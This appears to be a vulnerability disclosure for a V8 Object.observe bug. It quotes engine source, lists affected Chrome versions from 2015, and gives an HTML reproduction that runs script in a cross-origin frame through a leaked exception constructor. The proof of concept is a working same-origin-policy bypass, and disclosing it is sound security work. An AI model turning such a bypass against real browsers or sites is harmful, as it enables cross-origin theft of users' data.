#### VULNERABILITY DETAILS
From /v8/src/object-observe.js:
```javascript
function ObjectObserve(object, callback, acceptList) {
  (...)
  var objectObserveFn = %GetObjectContextObjectObserve(object);
  return objectObserveFn(object, callback, acceptList);
}
```
From /v8/src/runtime/runtime-observe.cc:
```cpp
RUNTIME_FUNCTION(Runtime_GetObjectContextObjectObserve) {
  (...)
  Handle<Context> context(object->GetCreationContext(), isolate);
  return context->native_object_observe();
}
```
|objectObserveFn| is taken from the creation context of the observed object, which may be a cross-origin context. When this function is invoked, any exception it raises is created in that context, and the exception object is then propagated to the caller's try-catch handler.
#### VERSION
Chrome 45.0.2454.85 (Stable)
Chrome 46.0.2490.22 (Beta)
Chrome 47.0.2503.0 (Dev)
Chromium 47.0.2510.0 (Release build compiled today)
#### REPRODUCTION CASE
```html
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.onload = function() {
  try {
    Object.observe(frames[0].location, Map, 0);
  } catch(e) {
    e.constructor.constructor('alert(location)')();
  }
}
i.src = 'https://abc.xyz';
</script>
```